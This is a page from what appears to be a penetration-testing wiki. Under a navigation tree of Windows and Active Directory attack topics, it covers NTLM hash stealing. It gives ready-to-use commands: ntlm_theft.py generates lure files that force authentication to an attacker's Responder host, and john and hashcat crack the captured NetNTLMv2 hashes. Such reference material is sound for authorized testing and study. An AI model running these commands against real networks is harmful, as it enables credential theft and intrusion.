SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Domain Privesc #NTLM Hash Stealing

NTLM Hash Stealing

The trick is to force victim server to auth attempt with attacker host. Check out places to steal NT hash. In general, wherever an UNC Path can be injected it's possible to have NTLM hash stealing vulnerability.

The ntlm_theft.py script is used to generate multiple files to steal NTLM response. These files can be uploaded wherever it's possible to execute them (e.g. an SMB share).

# Generate all files
python ntlm_theft.py -s $responder_ip -f $filename -g all
# Upload file and execute it from the victim machine
 
# Grab all NTLM responses
responder -I $net_interface

The captured NT hashes can then be cracked offline. However, these are not the hashes that can be used in a Pass-The-Hash type of attack.

NetNTLMv2 hash cracking:

# Quick
john -w /usr/share/wordlists/rockyou.txt $hash
 
# Common variations
hashcat -m 5600 $hash /usr/share/wordlists/rockyou.txt --force --rules /usr/share/hashcat/rules/best64.rule

Children

NTLM Hash Stealing